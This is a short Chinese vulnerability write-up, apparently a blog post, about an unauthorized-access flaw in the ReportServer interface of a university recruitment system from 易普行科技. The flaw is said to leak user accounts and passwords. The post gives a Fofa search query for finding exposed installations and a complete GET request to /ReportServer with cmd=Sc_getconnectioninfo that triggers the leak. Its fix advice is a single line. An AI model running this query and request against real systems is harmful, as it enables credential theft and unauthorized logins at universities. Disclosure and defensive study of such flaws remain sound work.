易普行科技高校招聘系统 ReportServer 敏感信息泄露

0x01 产品描述:

‌**易普行科技的高校招聘系统** ‌是一个专门为国内高校提供人力资源管理信息化服务的系统,由北京易普行科技有限公司开发。该公司总部位于北京市海淀区,并在上海、广州、南京、武汉、西安、成都等城市设有分支机构,业务覆盖全国各地区,已有众多高校用户,在业内树立了良好的口碑‌。
0x02 漏洞描述:

易普行科技高校招聘系统/ReportServer接口存在未授权访问泄露用户账号密码等重要数据,导致攻击者可通过泄露实现登录。
0x03 搜索语句:

Fofa:body="FM_SYS_ID" || body="product/recruit/website/RecruitIndex.jsp"


0x04 漏洞复现:

复制代码
GET /ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*


0x05 修复建议:

厂商已发布补丁 请即时修复。

相关推荐
汇能感知1 天前
摄像头模块在运动相机中的特殊应用
经验分享·笔记·科技
Highcharts.js1 天前
Highcharts 数据源安全最佳实践:保障数据安全,助力可视化可信部署
安全·highcharts
Suckerbin1 天前
LAMPSecurity: CTF5靶场渗透
笔记·安全·web安全·网络安全
水兵没月1 天前
解决Win11 安全中心删掉存在隐患的工具
安全
码农101号1 天前
运维安全04 - iptable的介绍以及使用
安全
wanhengidc1 天前
云手机运行流畅,秒开不卡顿
运维·网络·科技·游戏·智能手机
行思理1 天前
linux 安全与防护,全方向讲解
linux·安全·github
深盾安全1 天前
Flutter框架编译Android程序全攻略:从入门到进阶
安全
房屋安全鉴定检测1 天前
房屋安全鉴定报告有效期多久
安全·网络安全
心 一1 天前
Web安全基石:深入理解与防御SQL注入漏洞
sql·安全·web安全